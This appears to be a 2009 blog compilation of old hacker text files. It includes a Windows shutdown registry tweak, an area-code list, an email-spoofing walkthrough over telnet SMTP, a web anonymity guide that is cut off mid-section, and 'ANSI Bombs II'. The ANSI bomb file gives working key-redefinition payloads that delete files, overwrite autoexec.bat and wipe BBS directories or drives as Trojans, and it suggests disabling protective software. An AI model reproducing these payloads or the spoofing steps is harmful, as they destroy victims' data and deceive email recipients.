200+ HACKING TUTORIAL

Auto End Tasks to Enable a Proper Shutdown, Win XP Tweak

2009-11-03T03:08:00.001-08:00

Auto End Tasks to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.

1. Copy the following (everything in the box) into notepad.

QUOTE
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"

2. Save the file as shutdown.reg
3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

एरिया कोड एंड टाइम ZONE

2009-11-03T02:49:00.001-08:00

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_
|_ _|
_| _ _ _ _ |_
|_ ((___)) cDc communications ((___)) _|
_| [ x x ] presents... [ x x ] |_
|_ \ / \ / _|
_| (` ') AREA CODE AND TIME ZONE LISTING (` ') |_
|_ (U) (U) _|
_| |_
|_ by Bovine Priest and Cultee: _|
_| |_
|_ Reverend Dial Tone _|
_| |_
|_ dEM0n r0ACh uNDERGR0UNd (300/1200/2400) [806] 794-4362 _|
_| dRAG0NFIRe pRIVATe (1200 only) [609] 424-2606 |_
|_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _|
|_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_| |_|

Ok this is nothing big, it's my third text file for 1988 from cDc
communications. Here goes.

Time Zones
----------

Atlantic
--------

Newfoundland Nova Scotia New Brunswick

Eastern
-------

Maine New Hampshire Vermont Massachussets New York Rhode Island
Connecticut Pennsylvania New Jersey Delaware Maryland Ohio Indiana
Michigan West Virginia Virginia Kentucky North Carolina Tennessee
South Carolina Georgia Florida Quebec Ontario

Central
-------

Manitoba North Dakota South Dakota Minnesota Wisconsin Michigan Iowa
Nebraska Illinois Kansas Missouri Kentucky Tennessee Arkansas Oklahoma
Texas Louisiana Alabama Mississippi Indiana

Mountain
--------

Alberta Saskatchewan Montana Idaho Wyoming South Dakota Nebraska
Utah Colorado Kansas Oklahoma Arizona New Mexico

Pacific
-------

British Columbia Washington Montana Oregon Nevada California Utah

Area Code Listing
-----------------

205 - Alabama 907 - Alaska 602 - Arizona
501 - Arkansas 714 - California (Orange) 818 - California
213 - California (LA) 916 - California 619 - California
415 - California (SF) 408 - California (San Jose) 303 - Colorado
203 - Connecticut 302 - Delaware 904 - Florida
305 - Florida (Miami) 404 - Georgia (Atlanta) 808 - Hawaii
208 - Idaho 312 - Illinois (Chicago) 317 - Indiana
219 - Indiana (Souend) 515 - Iowa (Des Moines) 316 - Kansas
502 - Kentucky 504 - Lousiana (N. Orleans) 207 - Maine
301 - Maryland 617 - Massachusetts 313 - Michigan
616 - Michigan 612 - Minnesota 601 - Mississippi
816 - Missouri (Kansas C) 314 - Kansas (St. Louis) 406 - Montana
402 - Nebraska 702 - Nevada 603 - New Hampshire
201 - New Jersey (Newark) 609 - New Jersey (I'm here) 505 - New Mexico
718 - NYC (Brooklyn, S.I.) 212 - NYC (Bronx, Mhattan) 518 - NY (Albany)
716 - NY (Buffalo) 516 - NY (Long Island) 315 - NY (Syracuse)
914 - NY (White Plains) 704 - North Carolina 919 - North Carolina
701 - North Dakota 513 - Ohio (Cincinnati) 216 - Ohio
614 - Ohio (Columbus) 419 - Ohio (Toledo) 405 - Oklahoma
918 - Oklahoma (Tulsa) 503 - Oregon 215 - Philadelphia PA
401 - Rhode Island (cough) 803 - South Carolina 605 - South Dakota
901 - Tennessee (Memphis) 615 - Tennessee (Nashville) 806 - Texas(Cow Hell)
214 - Texas (Dallas) 817 - Texas (Forth Worth) 713 - Texas (Houston)
512 - Texas (San Antonio) 801 - Utah 802 - Vermont
703 - Virginia (Arlington) 804 - Virginia (Richmond) 202 - Washington DC
206 - Washington (Seattle) 304 - West Virginia 608 - Wisconsin
307 - Wyoming 666 - Where do you think

Well that will make a nice printout for your wall, won't it. Now
you know where you're calling...

Thanks to : Franken Gibe (cause he made me happy haha) and Swamp Rat

===============================================================================
(c) 1987, 1988 cDc communications e.o.f. 10:01 EST Jersey 1/13/88-38

by Reverend Dial Tone [Joel]

BOVINE IS FINE | BEEF IS CHIEF | COW IS NOW

anti leech hacking tutorial

2009-11-03T02:47:00.000-08:00

I was just asking to know if there is some audiance before
here is my methode
for hacking anti leech
we gona use a soft calde proxo mitron
proxomitron is an anti bull script web proxy it' works buy applying some rules to elliuminte pop up and many other thing but for our cas we need to desactive all this filtring first goto
w-w.proxomitron.info
download a copy of the soft
then you need to unselect all the option of the soft
and clik on log window
no go to a anti leech web site
use the plug in and not netpumper
in the plugin
add a proxy
you must put this proxy adress
127.0.0.1 8080 for http
the same for ftp
now select the file to download a click download
watch in proximitron log winodws you will see many internal forwarding
if the file are located in a ftp server
proximitron dont handel them
and you will find an error
in a ftp adress
if it's a http adress
you will find some thing like
get /blablalma/bla/file
site tr.com
and you have foudn the adress
it' tr.com/blabla/file

ANSIBombs II Tips And Techniques

2009-11-03T02:46:00.001-08:00

ANSI Bombs II: Tips and Techniques

By

The Raging Golem

I. Introduction

After writing the last file, a lot of people let me know about the
mistakes I had made. I guess this file is to clear up those miscon
ceptions and to let people know about some of the little tricks behind
ANSI bombing. Of course, ANSI bombing isn't as dangerous as a lot of
people make it out to be, but bombs are still fun to make and with a
little planning deliver some degree of success. ANSI bombing can
be dangerous, so I am tired of hearing people say that an ANSI bomb is
harmless, another misconception I hope to clear up. Now, most people
that have spent time experimenting with ANSI bombs probably know most
of the material in this file, but it might be fun just to read anyway.

2. Misconceptions

In my last file, I made three major blunders, or what I would con
sider to be major blunders. First, I said that ANSI bombs could be
used on BBSs to screw people over, but I guess I was wrong. It was
pure speculation on what other people had said that made me say that.
ANSI codes, including those that redefine keys, are sent over the
lines, but most comm programs don't use ANSI.SYS; they use their own
version of ANSI, which doesn't support key redefinition. Some people
might have a program that supports it, but I haven't seen it yet. I
have tested bombs on systems on my own and proved to myself that they
don't work. I have also seen people fuck up bombs that would have
worked by uploading them in a message. The second misconception is
that ANSI bombs are dangerous when put into zips. I haven't really
tested this out much, but from what I hear with the newer versions of
PKZIP, you have to specify that you want to see ANSI comments when
unzipping. It is unlikely that you would waste your time unzipping
something again after seeing "Format C:" in the middle of an escape
code. I could be mistaken, but I'm pretty sure that I'm right. Third,
the last thing that was a misconception is that VANSI.SYS will protect
your system from key redefinition. Maybe the newer versions don't
support key redefinition, but mine sure as hell does. There are pro
grams out there that don't support it, but I don't know any of the
names. Of course, if I were you, I would be wary about using some
thing other then ANSI. I have a few friends that are working on "A
Better ANSI" for PDers, which, instead of being better, really screws
them over.

3. An Overview

Now, in case you haven't read my other file (it's called ANSI.DOC,
kind of lame but fairly informative), I'll briefly go over the struc
ture of an ANSI bomb. Skip this part if you know what an ANSI bomb is
and how to make one.
In ANSI everything is done with a system of escape codes. Key
redefinition is one of those codes. (From now, whenever I say ESC, I
really mean the arrow, ). Here is a basic command:
ESC [13;27p
This would make the key (13 is the code for enter) turn
into the key (27 is the code for escape). The always has to
be there, as do the bracket and the "p", but what is between the
bracket and the "p" is up to you. The first number is always the key
that you want to be redefined. If there is a zero for the first num
ber, that means the key is in the extended set, and therefore, the
first two numbers are the code. The bracket signifies the beginning
of the definition, and the "p" signifies the end. Whenever you want a
key pressed, you have to use it's numerical code (i.e. 13 is the code
for ). You can't redefine strings, but you can redefine a key
to become a string (i.e. ESC [13;"Blah"p would make say
"Blah"). Strings must be inside of quotes, which includes commands
that you want typed on the DOS prompt (i.e. ESC [13;"Del *.*";13p
would delete everything in the directory, note that 13 stands for
Enter in this case, not the redefinition). An escape code can have
as many commands as you want in it, but each one has to be separated
by a semi-colon. You can only redefine one key in each escape code,
so if you want to redefine another key, you have to start another
escape code. That's about it when it comes to bombs, now that you
have the basics, all you really need is a little imagination.

4. Tips and Tricks

A. The Y/N Redefinition

Now, here's a simple but fun little ANSI bomb:

ESC [78;89;13p ESC [110;121;13p

Basically, all this does is turn a capital "N" into "Y" and a
lower-case "n" into "y". Alone this doesn't do too much, except for
screw around with what they are typing. On the other hand, try adding
this line of code to the ANSI bomb:

ESC [13;27;13;"del *.*";13p

Most people would automatically press "N" when they see "Del *.*",
but when they do, they will be screwed over. This portion of a bomb
is very useful when it comes to making good bombs.

B. Screwing with the Autoexec.bat

Here is another line of code that you may find useful in future
bombing projects:

ESC [13;27;13;"copy bomb.ans c:\";13;"copy con
c:\autoexec.bat";13;"type bomb.ans";13;0;109;
13;"cls";13p

This line of code makes the bomb a little more permanent and a
little more dangerous. It copies the bomb into the root directory,
then it change/creates the autoexec.bat, so the bomb is typed after
every boot-up. Of course, the person could just boot off a disk, but
I'm sure this would get them a few time. It could also probably
appear as though it were a virus, scaring the shit out of the owner of
the computer.

C. Turning Commands into Other Commands

One of the best pranks to do to someone using an ANSI bomb is to
redefine commands. That way if they type in "copy", it will turn into
"Del *.*". Since you can't actually change the whole string, you have
to take a different approach. You have to change a few of the keys,
so when typed, they type and execute the desired command. I guess it
would be coolest to have to command exactly the same length; that way
you could redefine one key at a time to obtain the desired effect.
It doesn't really matter how you do it, just as long as it works. You
might make an ANSI that says "Wow, check out what this bomb did to
your directory", and then have it redefine the keys, so when they type
in "dir", it turns into "del". I think you get the idea.

D. Trojans

By now, everybody knows what a Trojan is. You probably wouldn't
think so, but ANSI bombs can be used as Trojans and in Trojans. First,
if you are planning on crashing a board, but you're not very good at
programming, then make yourself an ANSI bomb. Try to find out in
which directory the main files for running the BBS are stored. They
are usually under the name BBS or the name of the software, like WWIV
or Telegard. Then, make a bomb that either just deletes all the files
in that directory, or if you want the board to be down a longer time,
then make one that formats the Hard Drive. In this form ANSI bombs,
if they are well planned out, can be easy to make Trojans. Second,
ANSI bombs can used in Trojans. This is probably stretching it a
little, but say you wanted to write a Trojan that would delete a
directory, every time you typed a certain key, then you could use an
ANSI bomb. First make some batch and com/exe files that would search
for protecting programs like Norton and turn them off. Then you could
copy the file into the root directory, along with your versions of
autoexec.bat, config.sys, ANSI.sys, and whatever else. (To make it
look more realistic make the files Resource.00x to trick the user,
then when copying, use the real name). Then somehow lock the computer
up or do a warm boot through some pd program, which is easily attain
able. When the computer loads back up, you can screw that shit out of
them with your ANSI bomb.

5. Conclusion
It would seem to some people that ANSI bombs are very dangerous,
and to others that they are stupid or lame. Personally, I think that
ANSI bombs are just plain old fun. They're not too hard to make, but
there is a lot that you can do with them. They are nowhere near as
malicious as virii, so if you're looking for unstoppable destruction,
look elsewhere, but they do serve their purpose. I know that there
are programs out there that help you program ANSI bombs, but I think
that they kind of take the fun out of them. Probably, some day soon,
I'll quit making ANSI bombs and start looking more into virii and pure
Trojans. But for now, ANSI bombs suit my purpose.

-TRG

Appendix A: Key Code Program

Here is a small program, which I find very helpful. After loading
it up, it tells you the numeric code for every key you type in. Spe
cial means that it is in the extended set and therefore uses zero, and
"q" ends the program. Unfortunately, I can't take any credit for
this program. I got it over the phone from Heavymetl, and it was made
by his brother. So many thanks go out to Heavymetl and his brother,
even though they'll probably be a little pissed at me for including
this in my file. It is in Pascal and can be compiled in most Turbo
Pascal compilers.

Use CRT;
Var
CH : CHAR;
Begin
Repeat
CH := ReadKey;
If CH = #0 then
Begin
CH := ReadKey;
WriteLn(CH,'(Special) - ',ORD(CH));
End
Else
WriteLn(CH,' - ',ORD(CH));
Until
CH = 'q';
End.

Thanks go out to:

Heavymetl and his brother for the program and ideas. Weapons
Master for the input and the help he has given me. Everybody else who
has helped me out; you know who you are, or at least, you think you
know who you are. Most of all, to those brave soldiers risking their
asses everyday for us half-way across the world in Saudi Arabia. Your
deeds haven't gone unnoticed, of course that's mainly because that's
all the news ever shows nowadays. Also, to anybody else I might have
forgotten. Thanks.

ANONYMOUS emails

2009-11-03T02:44:00.001-08:00

Welcome to Hackerdevil's guide on how to send ANONYMOUS e-mails to someone without a prog.

I am Hackerdevil and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Annonimous e-mails without a program, it doesn't take
to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.

This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made)

Well.....
Go to Start, then Run...
You have to Telnet (Xserver) on port 25

Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.
(25) mail port.

So now we are like this.

telnet iname.com 25

and then you hit enter
Then When you have telnet open put the following like it is written

helo

and the machine will reply with smth.

Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option.
Now you will se what you are writing.

then you put:

mail from: and so on...
If you make an error start all over again

Example:
mail from:

You hit enter and then you put:

rcpt to:
This one has to be an existance address as you are mailing anonymously to him.

Then you hit enter
And you type
Data
and hit enter once more

Then you write

Subject:whetever

And you hit enter

you write your mail

hit enter again (boring)

you put a simple:
.

Yes you don't see it its the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done

look:Try first do it with yourself I mean mail annonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!

Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....

Disclamer:Hackerdevil is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Hackerdevil" line. You can't modify or customize this text and i am also not responsable if you send an e-mail to an important guy and insult him, and i rectly advise you that this is for educational porpouses only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you. If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com" insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.

By Hackerdevil

hackerdevil@iname.com
www.angelfire.com/ar/HDanzi/index.html

Anonymity complete GUIDE By Theraider & Dangerous R.

2009-11-03T02:41:00.000-08:00

Anonymity on the web

[ t a b l e o f c o n t e n t s ]
01 - table of contents
02 - introduction
03 - first tips
04 - about proxies
05 - cookies
06 - ftp transfers
07 - secure transactions
08 - SSL tunelling
09 - anonymity on irc
10 - mail crypto (and pgp usage)
11 - icq privacy
12 - spyware
13 - cleaning tracks
14 - ending words

[ introduction ]
Nowadays, everyone wants privacy on the web, because no matter where you go, someone could be watching you. Someone like your employer, someone trying to hack your system, companies gathering all your info to sell to yet other companies, or even the government, may be on your track while you peacefully surf the web. Thus, anonymity on the web means being able tu use all of its services with no concern about someone snooping on your data.
Your computer being connected to the net has an IP [Internet Protocol] address. If you have a dial-up connection, then your IP changes every time you connect to the internet (this is not always true, though. There are dialup isps, specially for university students, that do have static ips). Cable modems and DSL connections have a static IP, which means that the IP address does not change. One of the goals of getting anonymous is to make sure your ip, either static or dynamic) isn't revealed to other users of the internet, or to server administrators of the servers you roam around when using internet services.
This text tries to give you some hints on how to maintain your anonimity on the web. Some of the hints may sound banal, but think of, if you really abide them in every situation.

[ first tips ]
When chatting on IRC, ICQ, AIM (etc..), do not give out personal information about yourself, where you live, work, etc.
Do not use your primary email address (the one your ISP gave you) anywhere except to family members, close friends or trusted people. Instead create for yourself a web-based email account such as yahoo, hotmail, dynamitemail, mail.com, etc. and use this e-mail address to signing up for services, when in the need to give your mail to download something, or to publish on your homepage.
When signing up for services on the web, don't give your real information like address, phone number and such unless you really need to do so. This is the kind of information that information gathering companies like to get, so that they can sell out and fill your mailbox with spam.
Use an anonymous proxy to surf the web. This makes sure your ip doesn't get stored on the webserver logs. (Webservers log every GET request made, together with date, hour, and IP. This is where the proxy comes in. They get the ip from the proxy, not yours)
Use a bouncer to connect to IRC networks, in case you don't trust the administrators, or the other users. A bouncer is a program that sits on a permanently connected machine that allows you to connect there, and from there to the irc server, just like a proxy works for webservers.
Use anonymous remailers to send out your e-mails.
Cryptography can also help you by making sure the material you send out the web, like by email, etc, is cyphered, not allowing anyone that doesn't have your key to read it (in key-based cryptography). Programs like PGP (pretty good privacy) are toolkits with all you need to cypher and uncypher your stuff.
Delete traces of your work with the computer including history files, cache or backup files.
[ about proxies ]
Proxies are caches that relay data. When you configure your web browser to use a proxy, it never connects to the URL. Instead it always connects to the proxy server, and asks it to get the URL for you. It works similarly with other type of services such as IRC, ICQ etc. There'll won't be direct connection between you and the server, so your real IP address won't be revealed to the server. When you view a website on the server, the server won't see your IP. Some of web proxies do not support forwarding of the cookies whose support is required by some of the websites (for ex. Hotmail).
Here are some anonymous proxies that you can use to surf anonymously (notice that some of these may be a payed service):
Aixs - http://aixs.net/
Rewebber - http://www.anon.de/
Anonymizer - http://www.anonymizer.com/
The Cloak - http://www.the-cloak.com/
You'll highly probably find many websites that provide the lists of unauthorised proxies and remailers . Such lists are being compiled usually with the help of port scanners or exploit scanners, scanning for computers with wingate or other proxies' backdoors. Using these proxies is illegal, and is being considered as unauthorized access of computer. If you get such list to your hands, check if the info is legal or compiled by script kiddie, and act acordingly.
If you anyhow decide not to use proxy, at least do not forget to remove your personal information from your browser. After you remove details like your name and e-mail address from your browser, the only info a Web site can sniff out is your ISP's address and geographical location. Also Java and JavaScript applets can take control of your browser unexpectedly, and if you are surfing to unknown and potentially dangerous places you should be aware of that. There are exploitable browser bugs (mainly Internet explorer ones) reported ever week.

[ cookies ]
Maybe you're not aware of the fact that if you have the "allow cookies" feature in your browser on, websites can store all sorts of information on your harddrive. Cookies are small files that contain various kind of information that can be read bt websites when you visit them. The usual usage is to track demographics for advertising agencies that want to see just what kinds of consumers a certain site is attracting. Web sites also use cookies to keep your account information up-to-date. Then for instance when you visit your e-mail webbased account without being unlogged some hours later, you find yourself being logged on, even if you turn off your computer. Your login and password was simply stored on your harddrive in cookie file. This is security threat, in case that there is more persons who have the access to your computer.
Most of the browsers offer the possiblity to turn off the cookies, but some of sites like Hotmail.com require them to be turned on. In case you decided to allow cookies, at least never forget to log off from the websites when you're finishing visiting them.

[ ftp transfers ]
When using an FTP client program to download files, assure yourself, that it's giving a bogus password, like guest@unknown.com, not your real one. If your browser lets you, turn off the feature that sends your e-mail address as a password for anonymous FTP sessions.

[ secure transaction ]
Everything being sent from the web server to your browser is usually in plain text format. That means, all transferred information can be easily sniffed on the route. Some of the web servers support SSL (which stands for Secure Socket Layer). To view and use these websites you'll need SSL support in your browser as well. You recognize, that the connection is encrypted, if URL starts with https:// instead of usual http://. Never use web server without SSL for sending or receiving sensitive private or business information (credit card numbers, passwords etc.)

[ SSL tunelling ]
What is SSL?
SSL stands for Secure Socket Layer. The ?Secure? implies an encryption, while Socket Layer denotes an addition to the Window Socket system, Winsock. For those that don?t know, a Socket is an attachment to a port on a system. You can have many sockets on one port, providing they are non-blocking (allowing control to pass through to another socket aware application which wishes to connect to that port).
A Secure Socket Layer means that any sockets under it, are both secure and safe. The idea behind SSL was to provide an encrypted, and thus, secure route for traffic along a socket based system, such as TCP/IP (the internet protocol). Doing this allows security in credit card transactions on the Internet, encrypted and protected communiqué along a data line, and overall peace of mind.
The SSL uses an encryption standard developed by RSA. RSA are a world respected American organisation that specializes in encryption and data security. Initially, they developed a cipher length of only 40 bits, for use with the Secure Socket Layer, this was considered weak and therefore a longer much more complicated encryption cipher was created, 128 bits. The reasoning behind it was simple: it needs to be secure.
The RSA site puts the advantage of a longer encryption length pretty clearly: because 40-bit encryption is considered to be relatively weak. 128-bits is about 309 septillion times ( 309,485,000,000,000,000,000,000,000 ) larger than 40-bits. This would mean it would take that many times longer to crack or break 128-bit encryption than it would 40-bit.
If you want more information on the technicalities or RSA?s SSL encryption engine, visit their site: http://www.rsasecurity.com/standards/ssl.
But what does all this encryption and security have to do with you?
Well, that?s a simple question. No matter how hard you try, at times your privacy will need to be knowingly invaded so you can make use of the product offered for doing so. If you think about food, for example, one cannot eat without swallowing. When we wish to make a transaction or view a site on the internet, where we have to give enough information away so that it happens, we also want to be assured no one else along the line gathers that data. An encrypted session would mean our data is not at the hands of any privacy perpetrators unless they knew how to decode it ? and the only ones in the know, are those you specifically wish. SSL uses public key encryption as explained in the PGP section.
To put this at a head: if you use an encrypted connection or session, you can be relatively assured that there are no prying eyes along the way.
And how do I implement SSL with SSL Tunnelling?
We know that a Secure Socket Layer is safe, but what we don?t know is what a Tunnel is. In the most simplistic form, a tunnel is a proxy. Like proxy voting in general elections, a tunnel will relay your data back and forth for you. You may be aware though, that there are already ?proxies? out there, and yes, that is true. Tunnelling is done via proxies, but it is not considered to be the same as a standard proxy relaying simply because it isn?t.
Tunnelling is very special kind of proxy relay, in that it can, and does relay data without interfering. It does this transparently and without grievance or any care for what is passing its way.
Now, if we add this ability to ?tunnel? data, any data, in a pipe, to the Secure Sockets Layer, we have a closed connection that is independent of the software carrying it; and something that is also encrypted. For those of you wanting to know a little more about the technicalities, the SSL layer is also classless in the sense it does not interferer with the data passed back and forth ? after all, it is encrypted and impossible to tamper with. That attribute means an SSL capable proxy is able to transfer data out of its ?proxied? connection to the destination required.
So to sum up, we have both a secure connection that does the job and relays things in the right direction; and we have direct tunnel that doesn?t care what we pass through it. Two very useful, and almost blind entities. All we need now is a secure proxy that we can use as the tunnel.
Proxies:
Secure proxies are alike standard proxies. We can either use an HTTP base SSL equipped proxy - one specifically designed for security HTTP traffic, but because of the ignorant nature of SSL communication, it can be bent to any needs ? or we can use a proper SSL service designed for our connection ? like you would use a secure NNTP (news) program with a secure proxy on port 563 instead of taking our long way - which would probably work as well.
A secure HTTP proxy operates on port 443. Host proxies are not public, that means they operate for, and allow only traffic from their subnet or the ISP that operates them ? but, there are many badly configured HTTP proxies and some public ones out there. The use of a program called HTTrack (available on Neworder) will aid you in scanning and searching for proxies on your network or anywhere on the Internet if your ISP does not provide you with one.
Neworder also features a number of sites dedicated to listing public proxies in the Anonymity section. While it?s often hard to find a suitable fast proxy, it?s worth the effort when you get one.
So how can I secure my connections with SSL Tunnelling?
That?s a big question, and beyond the scope out this tuition as it must come to and end. I can however, point you in the right direction of two resources that will aid you in tunnelling both IRC, and most other connections via a HTTP proxy.
For Windows, the first stop would be http://www.totalrc.net?s Socks2HTTP. This is an SSL tunnelling program that turns a normal socks proxy connection into a tunnelled SSL connection.
The second stop, for both Windows and Unix is stunnel. Stunnel is a GNU kit developed for SSL tunnelling any connection. It is available for compile and download as binary here: Stunnel homepage - http://mike.daewoo.com.pl/computer/stunnel

[ anonymity on irc ]
A BNC, or a Bouncer - is used in conjunction with IRC as a way of hiding your host when people /whois you. On most IRC networks, your host isnt masked when you whois, meaning the entire IP appears, like 194.2.0.21, which can be resolved. On other networks, your host might be masked, like IRCnetwork-0.1 but it can still give valuable information, like nationality if your host is not a IP, but a DNS resolved host, like my.host.cn would be masked to IRCnetwork-host.cn but this would still tell the person who whoised you, that you are from China.
To keep information such as this hidden from the other users on an IRC network, many people use a Bouncer, which is actually just a Proxy. Let us first draw a schematic of how a normal connection would look, with and without a BNC installed.
Without a BNC:
your.host.cn <<-->> irc.box.sk
With a BNC:
your.host.cn <<-->> my.shell.com <<-->> irc.box.sk
You will notice the difference between the two. When you have a BNC installed, a shell functions as a link between you and the IRC server (irc.box.sk as an example). You install a BNC on a shell, and set a port for it to listen for connections on. You then login to the shell with your IRC client, BitchX/Xchat/mIRC, and then it will login to the IRC server you specify - irc.box.sk in this case. In affect, this changes your host, in that it is my.shell.com that makes all the requests to irc.box.sk, and irc.box.sk doesn't know of your.host.cn, it has never even made contact with it.
In that way, depending on what host your shell has, you can login to IRC with a host like i.rule.com, these vhosts are then actually just an alias for your own machine, your.host.cn, and it is all completely transparent to the IRC server.
Many servers have sock bots that check for socket connections. These aren't BNC connections, and BNC cannot be tested using a simple bot, unless your shell has a socket port open (normally 1080) it will let you in with no problem at all, the shell is not acting as a proxy like you would expect, but more as a simple IRC proxy, or an IRC router. In one way, the BNC just changes the packet and sends it on, like:
to: my.shell.com -> to: irc.box.sk -> to: my.shell.com from: your.host.cn <- from: my.shell.com <- from: irc.box.sk
The BNC simply swaps the host of your packet, saying it comes from my.shell.com. But also be aware, that your own machine is perfectly aware that it has a connection established with my.shell.com, and that YOU know that you are connected to irc.box.sk. Some BNCs are used in IRC networks, to simulate one host. If you had a global IRC network, all linked together, you could have a local server called: cn.myircnetwork.com which Chinese users would log into. It would then Bounce them to the actual network server, in effect making all users from china have the same host - cn.myircnetwork.com, masking their hosts. Of course, you could change the host too - so it didn't reveal the nationality, but it is a nice gesture of some networks, that they mask all hosts from everyone, but it makes life hard for IRCops on the network - but its a small price to pay for privacy.
Note: Even if you do use IRC bouncer, within DCC transfers or chat, your IP will be revealed, because DCC requires direct IP to IP connection. Usual mistake of IRC user is to have DCC auto-reply turned on. For an attacker is then easy to DCC chat you or offer you a file, and when IRC clients are connected, he can find out your IP address in the list of his TCP/IP connections (netstat).
How do I get IRC bouncer?
you download and install bouncer software, or get someone to install it for you (probably the most known and best bouncer available is BNC, homepage : http://gotbnc.com/)
you configure and start the software - in case it's bouncer at Unix machine, you start it on your shell account (let's say shell.somewhere.com)
you open IRC and connect to the bouncer at shell.somewhere.com on the port you told it to start on.
all depending on the setup, you may have to tell it your password and tell it where to connect, and you're now on irc as shell.somewhere.com instead of your regular hostname
[ mail crypto ]
Usually the safest way to ensure that your e-mail won't be read by unauthorised persons is to encrypt them. To be compatible with the rest of the world I'd suggest to use free PGP software.
PGP (Pretty Good Privacy) is a piece of software, used to ensure that a message/file has not been changed, has not been read, and comes from the person you think it comes from. Download location: http://www.pgpi.org/
How does pgp Work?
The whole idea behind PGP is that of Public and Private keys. To explain the algorithm PGP uses in order to encrypt the message would take too much time, and is beyond the scope of this, we will however look at how it ensures the integrity of the document. A user has a password, this password has to be chosen correctly, so don't choose passwords like "pop" or "iloveyou", this will make an attack more likely to succeed. The password is used to create a private key, and a public key - the algorithm ensures that you can not use the public key to make the private key. The public key is sent to a server, or to the people you send e-mails/files, and you keep the private key secret.
We will use a few terms and people in this introduction, they are: Pk - Public Key, Sk - Secret Key (private key). Adam will send an e-mail to Eve, and Rita will be a person in between, who we are trying to hide the content of the mail from. Rita will intercept the email (PGP doesn't ensure that Rita cant get her hands on the package, she can - its not a secure line like other technologies) and try to read it/modify it. Adam has a Sk1 and a Pk1, and Eve has a Sk2 and a Pk2. Both Adam, Eve, and Rita have Pk1 and Pk2, but Sk1 and Sk2 are presumed to be totally secret. First, here is a schematic of how it all looks:
PUBLIC SERVER
Pk1, Pk2

Adam <------------------------------------------> Eve Sk1 ^ Sk2
|
|
|
|
Rita
So Adam wants to send a packet to Eve, without Rite reading it, or editing it. There are three things that we need to make sure:
That Rita cant read the text without permission
That Rita cant edit it in any way, without Eve and Adam knowing
That Even knows that Adam sent it
First thing is making sure Rita cant read the text. Adam does this by encrypting the message with Eves Pk2 which he has found on the server. You can only Encrypt with the Pk, not decrypt, so Rita wont be able to read the data unless Eve has revealed her Sk2.
The second thing to make sure, is that Rite cant edit the message. Adam creates a hash from the message he has created. The hash can be encrypted using Pk2, or sent as it is. When Eve gets the message, she decrypts it, and creates a hash herself, then checks if the hashes are the same - if they are, the message is the same, if its different, something has changed in the message. The Hash is very secure, and it is in theory impossible to make a change, and get the hash to remain the same.
The third, and probably one of the most important things to ensure, is that Rita hasn't grabbed the mail, made a new one, and sent it in Adams name. We can ensure this by using Public key and Private key too. The Sk can be used both to encrypt and to decrypt, but Pk can only encrypt. When Adam normally sends a message M to Eve, he creates the encrypted message C by doing: C=Pk2(M). This means, Adam uses Pk2 (Eves Pk) on message M to create message C. Image this: Adam can encrypt the message with his Sk1, because it is impossible to derive Sk1 from the message, this is secure and without any danger, as long as no one knows the password used to make Sk1 with. If the message M is encrypted with Sk1, he gets a message called X, Eve can decrypt the message using Pk1 which is public. If the message decrypts to something that makes sence, then it must be from Adam, because Sk1 is considered as secret, and only Adam knows it.
The entire process looks like this, when sending message C: Adam signs his digital signature on C, and hashes C: X=Sk1(C). Then Adam encrypts the message for Eve: M=Pk2(X). The message is sent, and looks all in all like this: M=Pk2(Sk1(C)). Rita can intercept M, but not decrypt, edit, or resend it. Eve receives M, and decrypts it: X=Sk2(M). Then she checks the digital signature: C=Pk1(X) and checks the Hash on the way.
This way, the PGP Public/Private key system ensures integrity and security of the document e-mail, but PGP is not the only algorithm that uses the Public/Private key theory, Blowfish, and RSA are among the many other technologies that use it, PGP is just the most popular for e-mail encryption, but many don't trust it because of rumors of backdoors by the NSA (I don't know if its true though). PGP comes in a commercial, and a freeware version for Windows, and is available for Linux as well. What ever encryption you use, it will be better than none.

[ anonymous remailers ]
Remailers are programs accessible on the Internet that route email and USENET postings anonymously (i.e., the recipient cannot determine who sent the email or posted the article). This way the sender can't be traced back by routing headers included in the e-mail. There are different classes of remailers, which allow anonymous exchange of email and anonymous posting to USENET and often many other useful features.
Resources:
Chain is a menu-driven remailer-chaining script:
http://www.obscura.com/crypto.html
Raph Levien's remailer availability page offers comprehensive information about the subject
http://www.sendfakemail.com/~raph/remailer-list.html
The Cypherpunks Remailers are being developed to provide a secure means of providing anonymity on the nets. Here you can find out about the available remailers, those which have been standard in existance for a long time as well as the new experimental remailers and anonymous servers.
http://www.csua.berkeley.edu/cypherpunks/remailer/

[ icq privacy ]
How can I keep my privacy at ICQ?
Send and receive messages via ICQ server, not directly. Every direct connection enables attacker to learn your IP. Encrypt your messages by dedicated software, encryption addons.
How to encrypt ICQ messages?
